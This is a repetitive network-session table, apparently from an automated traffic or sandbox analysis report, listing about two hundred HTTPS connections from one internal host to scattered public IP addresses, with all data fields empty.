                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14531192.168.2.1341554199.5.106.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14532192.168.2.1354664206.109.178.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14533192.168.2.1334636109.108.89.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14534192.168.2.135395231.159.21.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14535192.168.2.133565454.166.221.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14536192.168.2.135006663.88.14.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14537192.168.2.1354674217.246.158.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14538192.168.2.1334790107.155.64.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14539192.168.2.1337280209.187.145.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14540192.168.2.1333806200.108.12.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14541192.168.2.1343904104.35.73.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14542192.168.2.1338330110.90.85.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14543192.168.2.1333740152.246.127.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14544192.168.2.1343514113.28.53.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14545192.168.2.133458236.28.46.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14546192.168.2.1358376213.3.177.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14547192.168.2.1347918196.191.200.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14548192.168.2.135935619.227.128.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14549192.168.2.1347946217.16.12.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14550192.168.2.135433619.11.190.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14551192.168.2.1356252217.109.228.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14552192.168.2.1357946184.137.117.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14553192.168.2.1338440104.38.230.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14554192.168.2.134794668.36.47.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14555192.168.2.1343104174.91.95.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14556192.168.2.135419697.78.254.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14557192.168.2.1336964140.234.177.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14558192.168.2.134937412.24.239.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14559192.168.2.1354116142.4.189.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14560192.168.2.134858631.176.99.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14561192.168.2.1350100113.165.253.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14562192.168.2.135404464.178.79.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14563192.168.2.133447470.26.88.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14564192.168.2.1357106152.115.13.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14565192.168.2.134828477.29.216.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14566192.168.2.134485857.107.153.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14567192.168.2.135575271.59.229.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14568192.168.2.133547070.120.226.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14569192.168.2.134315443.224.207.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14570192.168.2.1353656111.111.170.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14571192.168.2.1347576166.236.95.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14572192.168.2.134156654.146.60.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14573192.168.2.1335806126.93.95.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14574192.168.2.135738869.131.155.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14575192.168.2.1350960154.97.106.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14576192.168.2.1333706183.133.61.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14577192.168.2.135035836.20.44.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14578192.168.2.135348274.16.72.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14579192.168.2.1340796110.157.16.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14580192.168.2.134783843.129.23.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14581192.168.2.1349438141.133.116.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14582192.168.2.1336924106.88.63.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14583192.168.2.1351422136.86.167.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14584192.168.2.1354264105.76.104.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14585192.168.2.1345860110.103.243.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14586192.168.2.1345170167.14.137.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14587192.168.2.135973653.127.162.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14588192.168.2.133715675.42.200.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14589192.168.2.1350570158.66.101.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14590192.168.2.133343464.161.58.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14591192.168.2.1353980196.18.186.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14592192.168.2.135983031.101.137.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14593192.168.2.133483878.49.0.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14594192.168.2.136075494.22.77.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14595192.168.2.1337584183.70.62.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14596192.168.2.135670023.133.12.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14597192.168.2.1344618142.159.34.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14598192.168.2.134253896.45.5.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14599192.168.2.1348906222.245.65.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14600192.168.2.1345012174.127.1.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14601192.168.2.133716675.17.251.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14602192.168.2.135548818.136.58.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14603192.168.2.135482618.247.23.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14604192.168.2.1351258128.130.70.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14605192.168.2.1353908102.178.200.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14606192.168.2.1360962114.40.86.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14607192.168.2.1345862131.249.212.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14608192.168.2.134525448.40.244.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14609192.168.2.1341758223.76.244.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14610192.168.2.135992240.197.27.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14611192.168.2.1353882195.67.135.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14612192.168.2.1340666193.85.157.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14613192.168.2.1349162120.201.58.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14614192.168.2.13495128.180.190.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14615192.168.2.1334278130.238.124.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14616192.168.2.1350440106.86.238.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14617192.168.2.1351624182.23.227.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14618192.168.2.133688896.93.75.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14619192.168.2.135075096.153.56.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14620192.168.2.1340032102.45.124.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14621192.168.2.135448276.244.42.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14622192.168.2.1360438190.29.190.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14623192.168.2.1359748195.119.138.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14624192.168.2.135729871.22.159.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14625192.168.2.1349176121.77.127.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14626192.168.2.133772463.192.145.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14627192.168.2.133898817.69.128.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14628192.168.2.1359186156.227.182.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14629192.168.2.1359618144.9.177.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14630192.168.2.13477641.129.88.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14631192.168.2.133529858.112.78.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14632192.168.2.135583276.29.183.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14633192.168.2.134382441.157.177.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14634192.168.2.1351704204.231.224.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14635192.168.2.1352420147.125.8.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14636192.168.2.1358354147.104.198.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14637192.168.2.133524459.232.49.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14638192.168.2.1359962115.144.93.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14639192.168.2.135617072.20.50.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14640192.168.2.134483037.52.137.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14641192.168.2.1336018208.31.128.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14642192.168.2.1339466119.222.57.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14643192.168.2.1342534220.3.29.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14644192.168.2.1339576181.170.9.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14645192.168.2.135862481.65.149.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14646192.168.2.135173891.114.217.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14647192.168.2.1337002153.95.109.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14648192.168.2.1333964143.148.85.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14649192.168.2.1335952122.141.245.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14650192.168.2.135792062.209.226.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14651192.168.2.1360764111.76.152.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14652192.168.2.1342794221.13.171.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14653192.168.2.1339186138.13.48.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14654192.168.2.1333698112.86.236.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14655192.168.2.13403921.56.213.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14656192.168.2.133972023.214.112.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14657192.168.2.133871612.190.123.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14658192.168.2.1340000199.131.223.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14659192.168.2.1358530124.192.88.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14660192.168.2.1355670106.58.11.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14661192.168.2.135292631.244.233.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14662192.168.2.1336528190.61.5.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14663192.168.2.1334862174.11.119.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14664192.168.2.1338312194.71.132.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14665192.168.2.1342936157.76.149.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14666192.168.2.1337402177.194.151.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14667192.168.2.1351942157.165.245.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14668192.168.2.134503283.78.23.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14669192.168.2.135201888.59.183.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14670192.168.2.135776062.228.25.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14671192.168.2.135711081.83.168.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14672192.168.2.135941640.149.205.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14673192.168.2.1333716203.215.109.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14674192.168.2.1343338166.94.98.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14675192.168.2.1337630132.10.223.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14676192.168.2.1358784139.26.126.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14677192.168.2.1352066132.229.229.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14678192.168.2.1352626223.243.10.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14679192.168.2.135837254.152.56.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14680192.168.2.1349756196.37.86.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14681192.168.2.1347424144.253.222.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14682192.168.2.1342392186.143.108.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14683192.168.2.134280889.134.216.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14684192.168.2.133707239.121.242.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14685192.168.2.1351924167.168.134.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14686192.168.2.1349074211.56.223.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14687192.168.2.1344086106.107.101.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14688192.168.2.1343432155.72.111.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14689192.168.2.133443480.234.7.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14690192.168.2.134632824.169.210.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14691192.168.2.133580241.251.188.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14692192.168.2.135253817.23.173.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14693192.168.2.133509862.54.231.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14694192.168.2.1335070148.60.245.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14695192.168.2.1346812192.232.148.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14696192.168.2.1337460152.170.211.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14697192.168.2.1350194174.10.255.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14698192.168.2.1334296130.247.67.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14699192.168.2.1341782104.58.57.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14700192.168.2.1347650201.144.126.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14701192.168.2.1334222221.84.9.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14702192.168.2.134453080.23.230.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14703192.168.2.1355596204.248.86.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14704192.168.2.135686220.46.239.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14705192.168.2.133343075.73.209.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14706192.168.2.1360848143.41.66.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14707192.168.2.1349350112.179.101.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14708192.168.2.1353168113.3.158.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14709192.168.2.133404438.207.162.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14710192.168.2.1347442219.203.248.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14711192.168.2.1333898196.25.11.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14712192.168.2.1353382154.146.136.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14713192.168.2.135601681.12.98.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14714192.168.2.134480467.213.98.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14715192.168.2.1341702157.204.80.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14716192.168.2.134181266.216.160.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14717192.168.2.1358392216.217.166.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14718192.168.2.135233644.206.82.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14719192.168.2.135991827.36.59.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14720192.168.2.1349132117.220.148.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14721192.168.2.134795045.177.154.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14722192.168.2.134764032.203.185.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14723192.168.2.1350482223.215.194.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14724192.168.2.1348224190.217.157.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14725192.168.2.1343496101.120.192.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14726192.168.2.1335804144.134.219.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14727192.168.2.1350428223.206.184.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14728192.168.2.1334836101.19.79.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14729192.168.2.1344978140.160.152.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14730192.168.2.135618286.212.88.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14731192.168.2.1357242205.122.243.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14732192.168.2.135392460.10.129.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14733192.168.2.1338400142.179.99.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14734192.168.2.1343726159.51.45.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14735192.168.2.1357808152.106.0.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14736192.168.2.1343742190.195.240.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14737192.168.2.1357126181.183.179.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14738192.168.2.1353136217.22.112.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14739192.168.2.135327457.74.115.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14740192.168.2.1360668108.243.2.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14741192.168.2.1358354152.52.151.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14742192.168.2.133428898.28.125.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
